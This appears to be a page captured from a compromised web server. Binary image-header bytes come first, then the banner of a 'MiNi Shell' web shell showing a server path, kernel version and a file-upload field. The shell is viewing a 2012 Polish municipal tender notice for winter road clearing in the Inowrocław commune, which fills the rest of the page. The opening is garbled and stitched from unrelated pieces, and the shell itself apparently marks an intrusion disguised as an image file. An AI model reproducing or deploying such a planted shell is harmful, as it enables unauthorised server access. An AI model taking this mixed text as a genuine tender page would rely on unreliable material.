JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121026/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121026/228325-N-2012.html

<p class="kh_header"><b>Inowrocław: Zimowe utrzymanie dróg gminnych na terenie gminy Inowrocław
w sezonie 2012/2013</b><br>
<b>Numer ogłoszenia: 228325 - 2012; data zamieszczenia: 26.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Inowrocław , ul. Królowej Jadwigi 43, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3570251, faks 52 3540490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.inowroclaw.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg gminnych na terenie gminy Inowrocław
w sezonie 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:

Zimowe utrzymanie dróg gminnych na terenie gminy Inowrocław w sezonie 2012/2013

Wspólny słownik Zamówień CPV

90.62.00.00-9 - usługi odśnieżania
90.63.00.00-2 - usługi usuwania oblodzeń

Przedmiot zamówienia polega na odśnieżaniu dróg gminnych na terenie gminy Inowrocław w celu utrzymania ich przejezdności i usuwaniu gołoledzi, poprzez posypywanie nawierzchni dróg piaskiem, w miejscach ich występowania.

2. Zamawiający dokonuje podziału przedmiotu zamówienia na 10 części, które odpowiadają podziałowi terenu gminy na 10 rejonów odśnieżania, w których niezależnie realizowane będzie zimowe utrzymanie dróg.
 Zimowe utrzymanie jednego rejonu gminy Inowrocław tożsame jest w wykonaniem jednej części przedmiotu zamówienia. Zamawiający dopuszcza możliwość złożenia oferty na świadczenie usług
w odniesieniu do jednej lub więcej części, lub całości przedmiotu zamówienia.

Wykonanie jednej części zamówienia (świadczenia usług na jednym rejonie) obejmuje świadczenie usług łącznie i nierozdzielnie, polegające na odśnieżaniu dróg gminnych na terenie gminy Inowrocław w celu utrzymania ich przejezdności i usuwaniu gołoledzi poprzez posypywanie nawierzchni dróg piaskiem w miejscach ich występowania.

Teren gminy Inowrocław dzieli się na 10 rejonów, w których niezależnie realizowane będzie zimowe utrzymanie dróg.
Zamawiający dokonuje podziału przedmiotu zamówienia na 10 części:
Część I - zimowe utrzymanie dróg wchodzących w skład Rejonu I - obejmuje drogi leżące w obrębie miejscowości:
Batkowo, Popowice, Żalinowo, Piotrkowice, Krusza Podlotowa, Krusza Zamkowa, Krusza Duchowna, Tupadły

Część II - zimowe utrzymanie dróg wchodzących w skład Rejonu II - obejmuje drogi leżące w obrębie miejscowości:
Sikorowo, Jaronty, Miechowice

Część III - zimowe utrzymanie dróg wchodzących w skład Rejonu III - obejmuje drogi leżące w obrębie miejscowości:
Dulsk, Łojewo, Ostrowo Krzyckie, Sikorowo

Część IV - zimowe utrzymanie dróg wchodzących w skład Rejonu IV - obejmuje drogi leżące w obrębie miejscowości:
Dulsk, Góra Karczyn, Łąkocin, Witowy, Pławinek

Część V - zimowe utrzymanie dróg wchodzących w skład Rejonu V - obejmuje drogi leżące w obrębie miejscowości:
Marulewy, Komaszyce, Turzany, Dziennice, Trzaski, Balczewo, Marcinkowo

Część VI - zimowe utrzymanie dróg wchodzących w skład Rejonu VI - obejmuje drogi leżące w obrębie miejscowości:
Marulewy, Jacewo, Olszewice, Słońsko, Balin, Latkowo

Część VII - zimowe utrzymanie dróg wchodzących w skład Rejonu VII - obejmuje drogi leżące w obrębie miejscowości:
Jacewo, Kłopot, Orłowo, Gnojno, Strzemkowo

Część VIII - zimowe utrzymanie dróg wchodzących w skład Rejonu VIII - obejmuje drogi leżące w obrębie miejscowości:
Mimowola, Cieślin, Sławęcinek, Sławęcin, Sójkowo, Kruśliwiec

Część IX - zimowe utrzymanie dróg wchodzących w skład Rejonu IX - obejmuje drogi leżące w obrębie miejscowości:
Pławin, Radłówek, Turlejewo, Borkowo, Jaksice (cześć zachodnia od drogi krajowej nr 25), 

Część X - zimowe utrzymanie dróg wchodzących w skład Rejonu X - obejmuje drogi leżące w obrębie miejscowości:
Oporówek, Czyste, Jaksice (część wschodnia od drogi krajowej nr 25), Stefanowo, Jaksiczki


Graficzny podział gminy Inowrocław na Rejony wraz z wykazem dróg objętych odśnieżaniem i działek został przedstawiony w formie map stanowiących załącznik nr 6 do SIWZ.

DLA KAŻDEJ CZĘŚCI USTALA SIĘ NASTĘPUJĄCE WARUNKI:
2. Do obowiązków wykonawcy będzie należało:
- utrzymanie pełnej gotowości sprzętu i ludzi 24 godz./dobę;
- zapewnienie łączności telefonicznej przez całą dobę - telefon stacjonarny i/lub komórkowy;
- zapewnienie, przygotowanie i utrzymanie niezbędnego zapasu piasku we własnym zakresie;
- przygotowanie specjalistycznego sprzętu drogowego - szczególnie do odśnieżania i likwidacji śliskości. Sprzęt powinien być przygotowany w takim stopniu, aby mógł być gotowy do użycia w ciągu 1 godziny od chwili powzięcia decyzji o konieczności podjęcia akcji na drogach. Sprzęt musi być sprawny technicznie i dopuszczony do ruchu zgodnie z obowiązującymi przepisami;
- usługi świadczone w przypadku wystąpienia opadów śniegu (odśnieżanie dróg gminnych) lub konieczności likwidacji śliskości zimowej i pośniegowej.

Do przedmiotu zamówienia należy również odśnieżanie przystanków zlokalizowanych przy drogach zlokalizowanych na terenie Gminy Inowrocław, wchodzących w skład konkretnego rejonu, po wcześniejszym zgłoszeniu potrzeby wykonania danej czynności przez Zamawiającego.
 
3. Bezpośredni nadzór nad prawidłowym przebiegiem wykonanych prac powierza się pracownikom Urzędu Gminy Inowrocław. Wykonawca każdego dnia, w którym podjął pracę będącą przedmiotem zamówienia, zobowiązany jest do poinformowania o fakcie zakończenia zadania. 

4. Wykonawca jest zobowiązany do ochrony przez uszkodzeniami lub zniszczeniem własności prywatnej i publicznej. Jeżeli w związku z niewłaściwym prowadzeniem robót, zaniedbaniem lub brakiem działań ze strony Wykonawcy nastąpi uszkodzenie lub zniszczenie własności prywatnej lub publicznej, to Wykonawca na swój koszt naprawi lub odtworzy uszkodzoną własność w taki sposób, aby stan naprawionej własności był nie gorszy niż przed powstaniem tego uszkodzenia lub zniszczenia.  

5. Drogi będące w zarządzie gminy Inowrocław zostały sklasyfikowane w standardach: V, VI i VII zimowego utrzymania dróg. 


Standard V - wymaga się, aby jezdnia była odśnieżona w stopniu zapewniającym komunikację, 
a w miejscach występowania zasp odśnieżony co najmniej jeden pas ruchu z wykonaniem mijanek. Na jezdni może występować zajeżdżony śnieg lub nabój śnieżny. Śnieg luźny będzie usunięty z jezdni w czasie do 16 godzin po ustaniu opadów śniegu. Zaspy należy usunąć z jezdni w czasie do 24 godzin po ustaniu opadów śniegu. Dopuszcza się przerwy w komunikacji do 24 godzin po ustaniu opadów śniegu. 
Drogi w standardzie V, na których kursuje komunikacja gminna muszą zostać odśnieżone do godziny 7:00. Jeżeli w danym dniu nastąpi konieczność ponownego odśnieżenia lub/i zwalczania śliskości zimowej i pośniegowej drogi, prace te będą miały charakter interwencyjny (rozpoczęcie prac ustala się najpóźniej w ciągu 1 godziny od zgłoszenia). 
Gołoledź lub gołoledź pośniegową, która wystąpi na drogach o standardzie V i VI należy zlikwidować w czasie do 8 godzin od otrzymania powzięcia uwiarygodnionych informacji o jej wystąpieniu od pracowników urzędu gminy. 

Standard VI - odśnieżanie prowadzi się interwencyjnie, w zależności od potrzeb, jezdnia posypywana i odśnieżana w miejscach wyznaczonych przez Zarządcę drogi. Rozpoczęcie prac ustala się najpóźniej w ciągu 1 godziny od zgłoszenia.
Standard VII - droga nie objęta zimowym utrzymaniem.

6. Wykonawca chcący złożyć ofertę musi dysponować odpowiednim potencjałem technicznym umożliwiającym wykonanie zadania. 
W przypadku składania oferty na jedno zadanie (odśnieżanie jednego z rejonów gminy Inowrocław przedstawionych w załączniku Nr 6 do SIWZ) wykonawca musi dysponować:
- samochód ciężarowy lub ciągnik o ładowności 10 - 15 Mg  - 1 szt. minimum
- piaskarki - 1 szt. minimum
- pługi lemieszowe - 1 szt. minimum
- ładowarki - 1 szt. minimum
- pług wirnikowy - 1 szt. minimum 
 
W przypadku składania oferty na dwa zadania (odśnieżanie dwóch rejonów gminy Inowrocław przedstawionych w załączniku Nr 6 do SIWZ) wykonawca musi dysponować:
- samochód ciężarowy lub ciągnik o ładowności 10 - 15 Mg  - 2 szt. minimum
- piaskarki - 1 szt. minimum
- pługi lemieszowe - 2 szt. minimum
- ładowarki - 1 szt. minimum
- pług wirnikowy - 1 szt. minimum*

W przypadku składania oferty na trzy zadania (odśnieżanie trzech rejonów gminy Inowrocław przedstawionych w załączniku Nr 6 do SIWZ) wykonawca musi dysponować:
- samochód ciężarowy lub ciągnik o ładowności 10 - 15 Mg  - 2 szt. minimum
- piaskarki - 2 szt. minimum
- pługi lemieszowe - 2 szt. minimum
- ładowarki - 1 szt. minimum
- pług wirnikowy - 1 szt. minimum*

W przypadku składnia ofert na więcej niż trzy zadania należy dysponować sprzętem w ilości wzrastającej proporcjonalnie do ilości odśnieżanych rejonów gminy Inowrocław. Sprzęt wykorzystywany do odśnieżania musi posiadać dodatkowe światła drogowe umożliwiające pracę
w warunkach ograniczonej widoczności, światła ostrzegawcze pulsujące barwy pomarańczowej oraz światła gabarytowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie 	oświadczenia wymienionego w pkt VIII. ppkt 1.1. SIWZ.
Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunkiem udziału w postępowaniu jest wykazanie przeprowadzonych wcześniej usług, w 	zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia. Wykonawca 	musi udokumentować, że wykonał minimum 1 usługę odpowiadającą swoim charakterem użytkowym przedmiotowi zamówienia, czyli zimowego utrzymania dróg, w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane poprawnie i prawidłowo ukończone.
Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku, będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się
o udzielenie zamówienia.
- potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VIII. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VIII. ppkt 1.2. SIWZ.
Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest oświadczenie o dysponowaniu niezbędnym 	sprzętem technicznym i narzędziami do wykonania zadania;

- potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VIII. ppkt 1.1. SIWZ oraz dokumentu 	wymienionego w pkt VIII. ppkt 1.3. SIWZ.

Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest oświadczenie o dysponowaniu osobami zdolnymi do wykonania zamówienia tj. osobami posiadającymi wymagane uprawnienia do wykonywania zamówienia

- potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie 	oświadczenia wymienionego w pkt VIII. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt VIII. ppkt 1.4. SIWZ.

Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie 	oświadczenia wymienionego w pkt VIII. ppkt 1.1. SIWZ., oraz 

- opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że 	wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 	działalności związanej z przedmiotem zamówienia,

Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian 
Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
3.Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu na następujących warunkach:
a)	jeżeli Zamawiający dokonał zmiany sposobu wykonania części przedmiotu umowy, czego nie można było przewidzieć przed zawarciem umowy,
b)	jeżeli warunki atmosferyczne nie pozwolą na wykonywanie części przedmiotu umowy ze względów technologicznych, co może mieć wpływ na jakość wykonania, trwałość i zachowanie okresu gwarancji lub wystąpią uzasadnione przypadki nieprzewidzianych warunków realizacji przedmiotu umowy,
c)	jeżeli zmianie ulegnie urzędowa stawka VAT,
d) 	na skutek siły wyższej zajdzie konieczność zmiany terminu wykonania zamówienia.

4. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. przedstawiciel Zamawiającego. 
5. Wykonawca będzie upoważniony do żądania przedłużenia terminu zakończenia przedmiotu umowy o okres powstały w wyniku przedłużonego postępowania o zamówienie publiczne. Okres, o jaki może wnioskować wykonawca należy liczyć od daty ustalonego pierwotnie terminu składania ofert powiększonego o siedem dni do dnia zawarcia umowy z wybranym Wykonawcą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.inowroclaw.ug.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Inowrocławiu ul. Królowej Jadwigi 43, 88-100 Inowrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2012 godzina 10:00, miejsce: Urząd Gminy w Inowrocławiu, ul. Królowej Jadwigi 43, 88-100 Inowrocław, Sekretariat - pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





